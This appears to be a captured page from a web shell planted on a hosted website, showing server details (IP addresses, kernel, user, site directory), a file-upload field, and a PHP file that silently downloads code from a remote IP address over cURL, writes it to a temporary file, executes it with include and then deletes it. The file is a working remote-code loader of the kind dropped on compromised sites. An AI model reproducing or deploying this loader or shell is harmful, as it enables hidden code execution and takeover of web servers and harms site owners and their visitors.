| Server IP : 217.160.0.59 / Your IP : 216.73.217.31 Web Server : Apache System : Linux infong-eu-cl0076 4.4.400-icpu-108 #2 SMP Wed Feb 11 11:51:01 UTC 2026 x86_64 User : u113791268 ( 2805329) PHP Version : 8.4.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /homepages/21/d978692583/htdocs/clickandbuilds/Lagamellesaine/ |
Upload File : |
<?php
$f = @tempnam(@sys_get_temp_dir(),"");
$handle = curl_init();
curl_setopt ($handle, CURLOPT_URL, 'http://69.30.227.202/file/0303.txt');
curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec( $handle );
if ( PHP_VERSION_ID < 80000 ) {
curl_close( $handle );
}
@file_put_contents($f, $result);
@include $f;
@unlink($f);